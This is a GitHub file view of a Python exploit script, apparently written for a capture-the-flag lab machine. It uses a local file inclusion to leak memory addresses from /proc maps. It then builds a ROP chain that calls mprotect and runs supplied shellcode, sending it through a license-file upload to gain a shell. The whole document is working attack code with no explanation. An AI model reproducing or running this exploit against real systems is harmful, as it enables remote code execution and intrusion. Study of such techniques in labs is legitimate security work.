-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy paththird_exploit.py
executable file
·64 lines (45 loc) · 1.67 KB
/
third_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python3
import re
import requests
import struct
import sys
ip = '10.10.11.154'
p64 = lambda n: struct.pack('<Q', n)
def get_addresses(pid):
r = requests.get(f'http://{ip}/index.php?page=/proc/{pid}/maps', allow_redirects=False)
elf_base_addr = re.findall(r'(.*?)\-.*?/usr/bin/activate_license', r.text)[0]
glibc_base_addr = re.findall(r'(.*?)\-.*?/usr/lib/x86_64-linux-gnu/libc-2.31.so', r.text)[0]
stack_addr = re.findall(r'(.*?)\-.*?\[stack\]', r.text)[0]
return int(elf_base_addr, 16), int(glibc_base_addr, 16), int(stack_addr, 16)
def craft_payload(pid, shellcode):
elf_addr, glibc_addr, stack_addr = get_addresses(pid)
pop_rdi_ret = glibc_addr + 0x26796
pop_rsi_ret = glibc_addr + 0x2890f
pop_rdx_ret = glibc_addr + 0xcb1cd
push_rsp_ret = glibc_addr + 0x3afc9
mprotect_addr = glibc_addr + 0xf8c20
offset = 520
junk = b'A' * offset
payload = junk
payload += p64(pop_rdi_ret)
payload += p64(stack_addr)
payload += p64(pop_rsi_ret)
payload += p64(0x21000)
payload += p64(pop_rdx_ret)
payload += p64(0b111)
payload += p64(mprotect_addr)
payload += p64(push_rsp_ret)
payload += shellcode
return {'licensefile': ('tmp_name', payload)}
def main():
if len(sys.argv) != 3:
print(f'[!] Usage: python3 {sys.argv[0]} <PID> <shellcode-file>')
return
pid, shellcode_file = sys.argv[1], sys.argv[2]
with open(shellcode_file, 'rb') as f:
shellcode = f.read()
requests.post(f'http://{ip}/activate_license.php',
files=craft_payload(pid, shellcode))
print('[+] Sent payload. Check listener')
if __name__ == '__main__':
main()